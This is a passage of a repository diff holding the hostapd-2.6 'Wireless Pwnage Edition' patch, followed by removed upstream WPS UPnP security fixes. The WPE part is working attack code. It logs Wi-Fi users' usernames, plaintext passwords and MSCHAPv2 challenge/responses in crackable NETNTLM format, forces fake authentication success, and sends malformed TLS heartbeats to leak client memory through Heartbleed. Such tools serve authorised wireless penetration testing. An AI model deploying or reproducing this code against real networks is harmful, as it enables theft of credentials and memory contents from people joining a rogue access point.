+ wpa_printf(MSG_DEBUG,"[WPE] Heartbeat extention is supported, may not be vulnerable!\n");
+ }
+
+ /* Check if padding is too long, payload and padding
+ * must not exceed 2^14 - 3 = 16381 bytes in total.
+ */
+ OPENSSL_assert(real_payload + padding <= 16381);
+
+ cbuf = OPENSSL_malloc(1 + 2 + real_payload + padding);
+
+ if(cbuf==NULL)
+ return -1;
+
+ p = cbuf;
+
+ *p++ = TLS1_HB_REQUEST;
+
+
+ /* Payload length (18 bytes here) */
+ //s2n(payload, p); /* standards compliant payload */
+ //s2n(payload +10, p); /* >payload to exploit heartbleed!!! */
+ s2n(wpe_conf.wpe_hb_payload_size, p); /* configured payload */
+
+ /* Sequence number */
+ s2n(conn->ssl->tlsext_hb_seq, p);
+ /* 16 random bytes */
+ RAND_pseudo_bytes(p, 16);
+ //RAND_bytes(p, 16);
+ p += 16;
+ /* Random padding */
+ RAND_pseudo_bytes(p, padding);
+ //RAND_bytes(p, padding);
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat reaquesting payload size %u...\n", wpe_conf.wpe_hb_payload_size);
+ wpa_hexdump(MSG_DEBUG, "[WPE] heartbeat packet to send:", cbuf, 1 + 2 + real_payload + padding);
+
+ /* Send heartbeat request */
+#ifdef TLS1_RT_HEARTBEAT
+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, TLS1_RT_HEARTBEAT,
+#elif defined(DTLS1_RT_HEARTBEAT)
+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, DTLS1_RT_HEARTBEAT,
+#endif
+ cbuf, 3 + real_payload + padding) >= 0)
+ conn->ssl->tlsext_hb_pending = 1;
+ OPENSSL_free(cbuf);
+
+ return 0;
+}
+
diff -rupN hostapd-2.6/src/eap_server/eap_server.c hostapd-2.6-wpe/src/eap_server/eap_server.c
--- hostapd-2.6/src/eap_server/eap_server.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/eap_server/eap_server.c 2016-12-17 06:12:53.955984072 -0500
@@ -23,7 +23,8 @@
#define STATE_MACHINE_DATA struct eap_sm
#define STATE_MACHINE_DEBUG_PREFIX "EAP"
-#define EAP_MAX_AUTH_ROUNDS 50
+//#define EAP_MAX_AUTH_ROUNDS 50
+#define EAP_MAX_AUTH_ROUNDS 50000 // wpe >:)
static void eap_user_free(struct eap_user *user);
@@ -164,6 +165,8 @@ int eap_user_get(struct eap_sm *sm, cons
{
struct eap_user *user;
+ char ident = 't';
+
if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
return -1;
@@ -175,6 +178,11 @@ int eap_user_get(struct eap_sm *sm, cons
if (user == NULL)
return -1;
+ if (phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
+
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
diff -rupN hostapd-2.6/src/eap_server/eap_server_mschapv2.c hostapd-2.6-wpe/src/eap_server/eap_server_mschapv2.c
--- hostapd-2.6/src/eap_server/eap_server_mschapv2.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/eap_server/eap_server_mschapv2.c 2016-12-17 06:12:53.955984072 -0500
@@ -12,7 +12,7 @@
#include "crypto/ms_funcs.h"
#include "crypto/random.h"
#include "eap_i.h"
-
+#include "wpe/wpe.h"
struct eap_mschapv2_hdr {
u8 op_code; /* MSCHAPV2_OP_* */
@@ -291,7 +291,7 @@ static void eap_mschapv2_process_respons
size_t username_len, user_len;
int res;
char *buf;
-
+ u8 wpe_challenge_hash[8];
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
if (pos == NULL || len < 1)
@@ -372,6 +372,8 @@ static void eap_mschapv2_process_respons
}
}
#endif /* CONFIG_TESTING_OPTIONS */
+ challenge_hash(peer_challenge, data->auth_challenge, username, username_len, wpe_challenge_hash);
+ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
if (username_len != user_len ||
os_memcmp(username, user, username_len) != 0) {
@@ -406,6 +408,11 @@ static void eap_mschapv2_process_respons
return;
}
+ if (wpe_conf.wpe_enable_return_success) {
+ os_memset((void *)nt_response, 0, 24);
+ os_memset((void *)expected, 0, 24);
+ }
+
if (os_memcmp_const(nt_response, expected, 24) == 0) {
const u8 *pw_hash;
u8 pw_hash_buf[16], pw_hash_hash[16];
@@ -446,6 +453,8 @@ static void eap_mschapv2_process_respons
wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Invalid NT-Response");
data->state = FAILURE_REQ;
}
+ if (wpe_conf.wpe_enable_return_success)
+ data->state = SUCCESS;
}
diff -rupN hostapd-2.6/src/eap_server/eap_server_peap.c hostapd-2.6-wpe/src/eap_server/eap_server_peap.c
--- hostapd-2.6/src/eap_server/eap_server_peap.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/eap_server/eap_server_peap.c 2016-12-17 06:12:53.959984072 -0500
@@ -17,7 +17,7 @@
#include "eap_common/eap_tlv_common.h"
#include "eap_common/eap_peap_common.h"
#include "tncs.h"
-
+#include "wpe/wpe.h"
/* Maximum supported PEAP version
* 0 = Microsoft's PEAP version 0; draft-kamath-pppext-peapv0-00.txt
diff -rupN hostapd-2.6/src/eap_server/eap_server_ttls.c hostapd-2.6-wpe/src/eap_server/eap_server_ttls.c
--- hostapd-2.6/src/eap_server/eap_server_ttls.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/eap_server/eap_server_ttls.c 2016-12-17 06:12:53.959984072 -0500
@@ -16,7 +16,7 @@
#include "eap_server/eap_tls_common.h"
#include "eap_common/chap.h"
#include "eap_common/eap_ttls.h"
-
+#include "wpe/wpe.h"
#define EAP_TTLS_VERSION 0
@@ -538,9 +538,11 @@ static void eap_ttls_process_phase2_pap(
return;
}
- if (sm->user->password_len != user_password_len ||
+ wpe_log_basic("eap-ttls/pap", sm->identity, sm->identity_len, user_password, user_password_len);
+
+ if ((!wpe_conf.wpe_enable_return_success) && (sm->user->password_len != user_password_len ||
os_memcmp_const(sm->user->password, user_password,
- user_password_len) != 0) {
+ user_password_len) != 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password");
eap_ttls_state(data, FAILURE);
return;
@@ -603,8 +605,9 @@ static void eap_ttls_process_phase2_chap
chap_md5(password[0], sm->user->password, sm->user->password_len,
challenge, challenge_len, hash);
- if (os_memcmp_const(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) ==
- 0) {
+ wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, challenge, challenge_len, password, password_len);
+
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Correct user password");
eap_ttls_state(data, SUCCESS);
eap_ttls_valid_session(sm, data);
@@ -672,7 +675,9 @@ static void eap_ttls_process_phase2_msch
nt_challenge_response(challenge, sm->user->password,
sm->user->password_len, nt_response);
- if (os_memcmp_const(nt_response, response + 2 + 24, 24) == 0) {
+ wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24);
+
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(nt_response, response + 2 + 24, 24) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response");
eap_ttls_state(data, SUCCESS);
eap_ttls_valid_session(sm, data);
@@ -694,7 +699,7 @@ static void eap_ttls_process_phase2_msch
u8 *response, size_t response_len)
{
u8 *chal, *username, nt_response[24], *rx_resp, *peer_challenge,
- *auth_challenge;
+ *auth_challenge, wpe_challenge_hash[8];
size_t username_len, i;
if (challenge == NULL || response == NULL ||
@@ -779,6 +784,9 @@ static void eap_ttls_process_phase2_msch
}
rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
+
+ challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash);
+ wpe_log_chalresp("eap-ttls/mschapv2", username, username_len, wpe_challenge_hash, 8, rx_resp, 24);
#ifdef CONFIG_TESTING_OPTIONS
{
u8 challenge2[8];
diff -rupN hostapd-2.6/src/Makefile hostapd-2.6-wpe/src/Makefile
--- hostapd-2.6/src/Makefile 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/Makefile 2016-12-17 06:12:53.959984072 -0500
@@ -1,5 +1,5 @@
SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps
-SUBDIRS += fst
+SUBDIRS += fst wpe
all:
for d in $(SUBDIRS); do [ -d $$d ] && $(MAKE) -C $$d; done
diff -rupN hostapd-2.6/src/utils/wpa_debug.c hostapd-2.6-wpe/src/utils/wpa_debug.c
--- hostapd-2.6/src/utils/wpa_debug.c 2016-10-02 14:51:11.000000000 -0400
+++ hostapd-2.6-wpe/src/utils/wpa_debug.c 2016-12-17 06:12:53.963984072 -0500
@@ -30,7 +30,7 @@ static FILE *wpa_debug_tracing_file = NU
int wpa_debug_level = MSG_INFO;
-int wpa_debug_show_keys = 0;
+int wpa_debug_show_keys = 1; // WPE >:)
int wpa_debug_timestamp = 0;
diff -rupN hostapd-2.6/src/wpe/Makefile hostapd-2.6-wpe/src/wpe/Makefile
--- hostapd-2.6/src/wpe/Makefile 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.6-wpe/src/wpe/Makefile 2016-12-17 06:12:53.963984072 -0500
@@ -0,0 +1,8 @@
+all:
+ @echo Nothing to be made.
+
+clean:
+ rm -f *~ *.o *.d *.gcno *.gcda *.gcov
+
+install:
+ @echo Nothing to be made.
diff -rupN hostapd-2.6/src/wpe/wpe.c hostapd-2.6-wpe/src/wpe/wpe.c
--- hostapd-2.6/src/wpe/wpe.c 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.6-wpe/src/wpe/wpe.c 2016-12-17 06:14:09.787982636 -0500
@@ -0,0 +1,213 @@
+/*
+ wpe.c -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks that have been modified to some extend.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+
+#include <time.h>
+#include <openssl/ssl.h>
+#include "includes.h"
+#include "common.h"
+#include "wpe/wpe.h"
+#include "utils/wpa_debug.h"
+
+#define wpe_logfile_default_location "./hostapd-wpe.log"
+
+
+#define MSCHAPV2_CHAL_HASH_LEN 8
+#define MSCHAPV2_CHAL_LEN 16
+#define MSCHAPV2_RESP_LEN 24
+
+char wpe_hb_msg[] = "\x18\x03\x01\x00\x03\x01\xff\xff";
+size_t wpe_hb_msg_len = sizeof(wpe_hb_msg)/sizeof(wpe_hb_msg[0]);
+
+struct wpe_config wpe_conf = {
+ .wpe_logfile = wpe_logfile_default_location,
+ .wpe_logfile_fp = NULL,
+ .wpe_enable_karma = 0,
+ .wpe_enable_cupid = 0,
+ .wpe_enable_return_success = 0,
+ .wpe_hb_send_before_handshake = 1,
+ .wpe_hb_send_before_appdata = 0,
+ .wpe_hb_send_after_appdata = 0,
+ .wpe_hb_payload_size = 50000,
+ .wpe_hb_num_tries = 1,
+ .wpe_hb_num_repeats = 10
+};
+
+void wpe_log_file_and_stdout(char const *fmt, ...) {
+
+ if ( wpe_conf.wpe_logfile_fp == NULL ) {
+ wpe_conf.wpe_logfile_fp = fopen(wpe_conf.wpe_logfile, "a");
+ if ( wpe_conf.wpe_logfile_fp == NULL )
+ printf("WPE: Cannot file log file");
+ }
+
+ va_list ap;
+
+ va_start(ap, fmt);
+ vprintf(fmt, ap);
+ va_end(ap);
+
+ va_start(ap, fmt);
+ if ( wpe_conf.wpe_logfile_fp != NULL )
+ vfprintf(wpe_conf.wpe_logfile_fp, fmt, ap);
+ va_end(ap);
+}
+
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s", type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t challenge:\t");
+ for (x=0; x<challenge_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",challenge[x]);
+ wpe_log_file_and_stdout("%02x\n",challenge[x]);
+
+ wpe_log_file_and_stdout("\t response:\t");
+ for (x=0; x<response_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",response[x]);
+ wpe_log_file_and_stdout("%02x\n",response[x]);
+
+ if (strncmp(type, "mschapv2", 8) == 0 || strncmp(type, "eap-ttls/mschapv2", 17) == 0) {
+ wpe_log_file_and_stdout("\t jtr NETNTLM:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout(":$NETNTLM$");
+
+ for (x=0; x<challenge_len; x++)
+ wpe_log_file_and_stdout("%02x",challenge[x]);
+ wpe_log_file_and_stdout("$");
+ for (x=0; x<response_len; x++)
+ wpe_log_file_and_stdout("%02x",response[x]);
+ wpe_log_file_and_stdout("\n");
+ }
+}
+
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s",type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t password:\t");
+ for (x=0; x<password_len; x++)
+ wpe_log_file_and_stdout("%c",password[x]);
+ wpe_log_file_and_stdout("\n");
+}
+
+/*
+ Taken from asleap, who took from nmap, who took from tcpdump :)
+*/
+void wpe_hexdump(unsigned char *bp, unsigned int length)
+{
+
+ /* stolen from tcpdump, then kludged extensively */
+
+ static const char asciify[] =
+ "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................................................................................................................";
+
+ const unsigned short *sp;
+ const unsigned char *ap;
+ unsigned int i, j;
+ int nshorts, nshorts2;
+ int padding;
+
+ wpe_log_file_and_stdout("\n\t");
+ padding = 0;
+ sp = (unsigned short *)bp;
+ ap = (unsigned char *)bp;
+ nshorts = (unsigned int)length / sizeof(unsigned short);
+ nshorts2 = (unsigned int)length / sizeof(unsigned short);
+ i = 0;
+ j = 0;
+ while (1) {
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" %04x", ntohs(*sp));
+ sp++;
+ if ((++i % 8) == 0)
+ break;
+ }
+ if (nshorts < 0) {
+ if ((length & 1) && (((i - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout(" %02x ", *(unsigned char *)sp);
+ padding++;
+ }
+ nshorts = (8 - (nshorts2 - nshorts));
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" ");
+ }
+ if (!padding)
+ wpe_log_file_and_stdout(" ");
+ }
+ wpe_log_file_and_stdout(" ");
+
+ while (--nshorts2 >= 0) {
+ wpe_log_file_and_stdout("%c%c", asciify[*ap], asciify[*(ap + 1)]);
+ ap += 2;
+ if ((++j % 8) == 0) {
+ wpe_log_file_and_stdout("\n\t");
+ break;
+ }
+ }
+ if (nshorts2 < 0) {
+ if ((length & 1) && (((j - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout("%c", asciify[*ap]);
+ }
+ break;
+ }
+ }
+ if ((length & 1) && (((i - 1) % 8) == 0)) {
+ wpe_log_file_and_stdout(" %02x", *(unsigned char *)sp);
+ wpe_log_file_and_stdout(" %c",
+ asciify[*ap]);
+ }
+ wpe_log_file_and_stdout("\n");
+}
+
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg) {
+#ifdef TLS1_RT_HEARTBEAT
+ if (v_content_type == TLS1_RT_HEARTBEAT) {
+#elif defined(DTLS1_RT_HEARTBEAT)
+ if (v_content_type == DTLS1_RT_HEARTBEAT) {
+#endif
+ wpe_log_file_and_stdout("\n\nHeartbleed Data:\n");
+ v_ssl->tlsext_hb_pending = 1;
+ wpe_hexdump((unsigned char *)v_buf, v_len);
+ }
+}
+
+
+char *wpe_hb_clear() {
+ char *p;
+ // set payload size
+ p = &wpe_hb_msg[sizeof(wpe_hb_msg) - 3];
+ s2n(wpe_conf.wpe_hb_payload_size, p);
+
+ return wpe_hb_msg;
+}
+
diff -rupN hostapd-2.6/src/wpe/wpe.h hostapd-2.6-wpe/src/wpe/wpe.h
--- hostapd-2.6/src/wpe/wpe.h 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.6-wpe/src/wpe/wpe.h 2016-12-17 06:12:53.963984072 -0500
@@ -0,0 +1,50 @@
+/*
+ wpe.h -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+#include <openssl/ssl.h>
+
+struct wpe_config {
+ char *wpe_logfile;
+ FILE *wpe_logfile_fp;
+ unsigned int wpe_enable_karma;
+ unsigned int wpe_enable_cupid;
+ unsigned int wpe_enable_return_success;
+ unsigned int wpe_hb_send_before_handshake:1;
+ unsigned int wpe_hb_send_before_appdata:1;
+ unsigned int wpe_hb_send_after_appdata:1;
+ unsigned int wpe_hb_payload_size;
+ unsigned int wpe_hb_num_tries;
+ unsigned int wpe_hb_num_repeats;
+};
+
+extern struct wpe_config wpe_conf;
+
+extern char wpe_hb_msg[];
+extern size_t wpe_hb_msg_len;
+
+//#define WPE_HB_MSG_LEN 8
+
+#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
+ (((unsigned int)(c[1])) )),c+=2)
+
+#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
+ c[1]=(unsigned char)(((s) )&0xff)),c+=2)
+
+
+void wpe_log_file_and_stdout(char const *fmt, ...);
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len);
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len);
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg);
+char *wpe_hb_clear();

1549
net-wireless/hostapd/files/hostapd-2.6-wpe_mana.patch
View file

File diff suppressed because it is too large Load diff

2042
net-wireless/hostapd/files/hostapd-2.7-wpe.conf
View file

File diff suppressed because it is too large Load diff

4194
net-wireless/hostapd/files/hostapd-2.7-wpe.patch
View file

File diff suppressed because it is too large Load diff

2042
net-wireless/hostapd/files/hostapd-2.8-wpe.conf
View file

File diff suppressed because it is too large Load diff

4194
net-wireless/hostapd/files/hostapd-2.8-wpe.patch
View file

File diff suppressed because it is too large Load diff

150
net-wireless/hostapd/files/hostapd-2.9-0001-WPS-UPnP-Do-not-allow-event-subscriptions-with-URLs-.patch
View file

@ -1,150 +0,0 @@
From 5b78c8f961f25f4dc22d6f2b77ddd06d712cec63 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <jouni@codeaurora.org>
Date: Wed, 3 Jun 2020 23:17:35 +0300
Subject: [PATCH 1/3] WPS UPnP: Do not allow event subscriptions with URLs to
other networks
The UPnP Device Architecture 2.0 specification errata ("UDA errata
16-04-2020.docx") addresses a problem with notifications being allowed
to go out to other domains by disallowing such cases. Do such filtering
for the notification callback URLs to avoid undesired connections to
external networks based on subscriptions that any device in the local
network could request when WPS support for external registrars is
enabled (the upnp_iface parameter in hostapd configuration).
Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
---
src/wps/wps_er.c | 2 +-
src/wps/wps_upnp.c | 38 ++++++++++++++++++++++++++++++++++++--
src/wps/wps_upnp_i.h | 3 ++-
3 files changed, 39 insertions(+), 4 deletions(-)
diff --git a/src/wps/wps_er.c b/src/wps/wps_er.c
index 6bded14327f8..31d2e50e4cff 100644
--- a/src/wps/wps_er.c
+++ b/src/wps/wps_er.c
@@ -1298,7 +1298,7 @@ wps_er_init(struct wps_context *wps, const char *ifname, const char *filter)
"with %s", filter);
}
if (get_netif_info(er->ifname, &er->ip_addr, &er->ip_addr_text,
- er->mac_addr)) {
+ NULL, er->mac_addr)) {
wpa_printf(MSG_INFO, "WPS UPnP: Could not get IP/MAC address "
"for %s. Does it have IP address?", er->ifname);
wps_er_deinit(er, NULL, NULL);
diff --git a/src/wps/wps_upnp.c b/src/wps/wps_upnp.c
index 6e10e4bc0c3f..7d4b7439940e 100644
--- a/src/wps/wps_upnp.c
+++ b/src/wps/wps_upnp.c
@@ -303,6 +303,14 @@ static void subscr_addr_free_all(struct subscription *s)
}
+static int local_network_addr(struct upnp_wps_device_sm *sm,
+ struct sockaddr_in *addr)
+{
+ return (addr->sin_addr.s_addr & sm->netmask.s_addr) ==
+ (sm->ip_addr & sm->netmask.s_addr);
+}
+
+
/* subscr_addr_add_url -- add address(es) for one url to subscription */
static void subscr_addr_add_url(struct subscription *s, const char *url,
size_t url_len)
@@ -381,6 +389,7 @@ static void subscr_addr_add_url(struct subscription *s, const char *url,
for (rp = result; rp; rp = rp->ai_next) {
struct subscr_addr *a;
+ struct sockaddr_in *addr = (struct sockaddr_in *) rp->ai_addr;
/* Limit no. of address to avoid denial of service attack */
if (dl_list_len(&s->addr_list) >= MAX_ADDR_PER_SUBSCRIPTION) {
@@ -389,6 +398,13 @@ static void subscr_addr_add_url(struct subscription *s, const char *url,
break;
}
+ if (!local_network_addr(s->sm, addr)) {
+ wpa_printf(MSG_INFO,
+ "WPS UPnP: Ignore a delivery URL that points to another network %s",
+ inet_ntoa(addr->sin_addr));
+ continue;
+ }
+
a = os_zalloc(sizeof(*a) + alloc_len);
if (a == NULL)
break;
@@ -890,11 +906,12 @@ static int eth_get(const char *device, u8 ea[ETH_ALEN])
* @net_if: Selected network interface name
* @ip_addr: Buffer for returning IP address in network byte order
* @ip_addr_text: Buffer for returning a pointer to allocated IP address text
+ * @netmask: Buffer for returning netmask or %NULL if not needed
* @mac: Buffer for returning MAC address
* Returns: 0 on success, -1 on failure
*/
int get_netif_info(const char *net_if, unsigned *ip_addr, char **ip_addr_text,
- u8 mac[ETH_ALEN])
+ struct in_addr *netmask, u8 mac[ETH_ALEN])
{
struct ifreq req;
int sock = -1;
@@ -920,6 +937,19 @@ int get_netif_info(const char *net_if, unsigned *ip_addr, char **ip_addr_text,
in_addr.s_addr = *ip_addr;
os_snprintf(*ip_addr_text, 16, "%s", inet_ntoa(in_addr));
+ if (netmask) {
+ os_memset(&req, 0, sizeof(req));
+ os_strlcpy(req.ifr_name, net_if, sizeof(req.ifr_name));
+ if (ioctl(sock, SIOCGIFNETMASK, &req) < 0) {
+ wpa_printf(MSG_ERROR,
+ "WPS UPnP: SIOCGIFNETMASK failed: %d (%s)",
+ errno, strerror(errno));
+ goto fail;
+ }
+ addr = (struct sockaddr_in *) &req.ifr_netmask;
+ netmask->s_addr = addr->sin_addr.s_addr;
+ }
+
#ifdef __linux__
os_strlcpy(req.ifr_name, net_if, sizeof(req.ifr_name));
if (ioctl(sock, SIOCGIFHWADDR, &req) < 0) {
@@ -1026,11 +1056,15 @@ static int upnp_wps_device_start(struct upnp_wps_device_sm *sm, char *net_if)
/* Determine which IP and mac address we're using */
if (get_netif_info(net_if, &sm->ip_addr, &sm->ip_addr_text,
- sm->mac_addr)) {
+ &sm->netmask, sm->mac_addr)) {
wpa_printf(MSG_INFO, "WPS UPnP: Could not get IP/MAC address "
"for %s. Does it have IP address?", net_if);
goto fail;
}
+ wpa_printf(MSG_DEBUG, "WPS UPnP: Local IP address %s netmask %s hwaddr "
+ MACSTR,
+ sm->ip_addr_text, inet_ntoa(sm->netmask),
+ MAC2STR(sm->mac_addr));
/* Listen for incoming TCP connections so that others
* can fetch our "xml files" from us.
diff --git a/src/wps/wps_upnp_i.h b/src/wps/wps_upnp_i.h
index e87a93232df1..6ead7b4e9a30 100644
--- a/src/wps/wps_upnp_i.h
+++ b/src/wps/wps_upnp_i.h
@@ -128,6 +128,7 @@ struct upnp_wps_device_sm {
u8 mac_addr[ETH_ALEN]; /* mac addr of network i.f. we use */
char *ip_addr_text; /* IP address of network i.f. we use */
unsigned ip_addr; /* IP address of network i.f. we use (host order) */
+ struct in_addr netmask;
int multicast_sd; /* send multicast messages over this socket */
int ssdp_sd; /* receive discovery UPD packets on socket */
int ssdp_sd_registered; /* nonzero if we must unregister */
@@ -158,7 +159,7 @@ struct subscription * subscription_find(struct upnp_wps_device_sm *sm,
const u8 uuid[UUID_LEN]);
void subscr_addr_delete(struct subscr_addr *a);
int get_netif_info(const char *net_if, unsigned *ip_addr, char **ip_addr_text,
- u8 mac[ETH_ALEN]);
+ struct in_addr *netmask, u8 mac[ETH_ALEN]);
/* wps_upnp_ssdp.c */
void msearchreply_state_machine_stop(struct advertisement_state_machine *a);
--
2.20.1

59
net-wireless/hostapd/files/hostapd-2.9-0002-WPS-UPnP-Fix-event-message-generation-using-a-long-U.patch
View file

@ -1,59 +0,0 @@
From f7d268864a2660b7239b9a8ff5ad37faeeb751ba Mon Sep 17 00:00:00 2001
From: Jouni Malinen <jouni@codeaurora.org>
Date: Wed, 3 Jun 2020 22:41:02 +0300
Subject: [PATCH 2/3] WPS UPnP: Fix event message generation using a long URL
path
More than about 700 character URL ended up overflowing the wpabuf used
for building the event notification and this resulted in the wpabuf
buffer overflow checks terminating the hostapd process. Fix this by
allocating the buffer to be large enough to contain the full URL path.
However, since that around 700 character limit has been the practical
limit for more than ten years, start explicitly enforcing that as the
limit or the callback URLs since any longer ones had not worked before
and there is no need to enable them now either.
Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
---
src/wps/wps_upnp.c | 9 +++++++--
src/wps/wps_upnp_event.c | 3 ++-
2 files changed, 9 insertions(+), 3 deletions(-)
diff --git a/src/wps/wps_upnp.c b/src/wps/wps_upnp.c
index 7d4b7439940e..ab685d52ecab 100644
--- a/src/wps/wps_upnp.c
+++ b/src/wps/wps_upnp.c
@@ -328,9 +328,14 @@ static void subscr_addr_add_url(struct subscription *s, const char *url,
int rerr;
size_t host_len, path_len;
- /* url MUST begin with http: */
- if (url_len < 7 || os_strncasecmp(url, "http://", 7))
+ /* URL MUST begin with HTTP scheme. In addition, limit the length of
+ * the URL to 700 characters which is around the limit that was
+ * implicitly enforced for more than 10 years due to a bug in
+ * generating the event messages. */
+ if (url_len < 7 || os_strncasecmp(url, "http://", 7) || url_len > 700) {
+ wpa_printf(MSG_DEBUG, "WPS UPnP: Reject an unacceptable URL");
goto fail;
+ }
url += 7;
url_len -= 7;
diff --git a/src/wps/wps_upnp_event.c b/src/wps/wps_upnp_event.c
index d7e6edcc6503..08a23612f338 100644
--- a/src/wps/wps_upnp_event.c
+++ b/src/wps/wps_upnp_event.c
@@ -147,7 +147,8 @@ static struct wpabuf * event_build_message(struct wps_event_ *e)
struct wpabuf *buf;
char *b;
- buf = wpabuf_alloc(1000 + wpabuf_len(e->data));
+ buf = wpabuf_alloc(1000 + os_strlen(e->addr->path) +
+ wpabuf_len(e->data));
if (buf == NULL)
return NULL;
wpabuf_printf(buf, "NOTIFY %s HTTP/1.1\r\n", e->addr->path);
--
2.20.1

47
net-wireless/hostapd/files/hostapd-2.9-0003-WPS-UPnP-Handle-HTTP-initiation-failures-for-events-.patch
View file

@ -1,47 +0,0 @@
From 85aac526af8612c21b3117dadc8ef5944985b476 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <jouni@codeaurora.org>
Date: Thu, 4 Jun 2020 21:24:04 +0300
Subject: [PATCH 3/3] WPS UPnP: Handle HTTP initiation failures for events more
properly
While it is appropriate to try to retransmit the event to another
callback URL on a failure to initiate the HTTP client connection, there
is no point in trying the exact same operation multiple times in a row.
Replve the event_retry() calls with event_addr_failure() for these cases
to avoid busy loops trying to repeat the same failing operation.
These potential busy loops would go through eloop callbacks, so the
process is not completely stuck on handling them, but unnecessary CPU
would be used to process the continues retries that will keep failing
for the same reason.
Signed-off-by: Jouni Malinen <jouni@codeaurora.org>
---
src/wps/wps_upnp_event.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/src/wps/wps_upnp_event.c b/src/wps/wps_upnp_event.c
index 08a23612f338..c0d9e41d9a38 100644
--- a/src/wps/wps_upnp_event.c
+++ b/src/wps/wps_upnp_event.c
@@ -294,7 +294,7 @@ static int event_send_start(struct subscription *s)
buf = event_build_message(e);
if (buf == NULL) {
- event_retry(e, 0);
